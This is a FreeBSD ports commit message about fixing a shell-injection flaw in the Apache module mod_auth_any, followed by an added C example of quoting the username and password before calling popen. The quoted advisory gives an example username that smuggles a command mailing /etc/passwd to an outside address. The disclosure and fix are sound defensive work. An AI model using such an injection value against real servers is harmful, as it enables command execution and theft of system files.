author: Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org> 2003-03-25 12:23:11 +0800
committer: Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org> 2003-03-25 12:23:11 +0800
commit: 0025bdf0b2935e18a51f4a900650754c207175a5
tree: 7843767d8e7a5f47abe9adc65b6afa236e27f1d4 /chinese/libtabe
parent: 7a568562a206c6673ba949eb6af0f4d06217ec9f

o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process.

  Background [1]:

  "The module accepts a username and password from the web client,
  passes them to a user-space executable (using popen(3), which
  invokes a shell) and waits for a response in order to authenticate
  the user. The password is quoted on the popen() command line to
  avoid interpretation of shell special chars, but the username is
  not. Thus a malicious user can execute commands by supplying an
  appropriately crafted username. (e.g. "foo&mail
  me@my.home</etc/passwd")

  "The problem is easily fixed by adding quotes (and escaping any
  quotes already present) to the username and password in the popen
  command line."

o Fix this by adding an escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.

o Bump PORTREVISION

Submitted by: Security Officer (nectar),
              Red Hat Security Response Team <security@redhat.com> [1]
Obtained from: mod_auth_any CVS [2], nalin@redhat.com [3]

Diffstat (limited to 'chinese/libtabe')
0 files changed, 0 insertions, 0 deletions
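
The fix the quoted background describes (quote both fields and escape any quotes already present), shown as an added C example. It is not the code from this commit or from mod_auth_any; the function names and the helper path are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Wrap `in` in single quotes, rewriting each embedded ' as '\'' so a POSIX
 * shell reads it as one literal word. malloc'd result or NULL; caller frees. */
char *shell_quote(const char *in)
{
    size_t n = 0, len = 2;                 /* opening + closing quote */
    for (const char *p = in; *p; p++)
        len += (*p == '\'') ? 4 : 1;
    char *out = malloc(len + 1);
    if (out == NULL)
        return NULL;
    out[n++] = '\'';
    for (const char *p = in; *p; p++) {
        if (*p == '\'') {
            memcpy(out + n, "'\\''", 4);   /* close, escaped quote, reopen */
            n += 4;
        } else {
            out[n++] = *p;
        }
    }
    out[n++] = '\'';
    out[n] = '\0';
    return out;
}

/* Build "<helper> <user> <pass>" for popen(3) with both fields quoted.
 * `helper` is assumed to be a trusted, admin-configured path. */
char *build_auth_command(const char *helper, const char *user, const char *pass)
{
    char *qu = shell_quote(user), *qp = shell_quote(pass), *cmd = NULL;
    if (qu != NULL && qp != NULL) {
        size_t len = strlen(helper) + strlen(qu) + strlen(qp) + 3;
        if ((cmd = malloc(len)) != NULL)
            snprintf(cmd, len, "%s %s %s", helper, qu, qp);
    }
    free(qu); free(qp);
    return cmd;
}

int main(void)
{
    /* Constructed sample input: a username containing a quote. */
    char *cmd = build_auth_command("/path/to/auth_helper", "o'brien", "p w");
    if (cmd != NULL) puts(cmd);
    free(cmd);
    return 0;
}
```

Handing the username and password to the helper through fork and execv, with no shell involved, removes the need for quoting altogether.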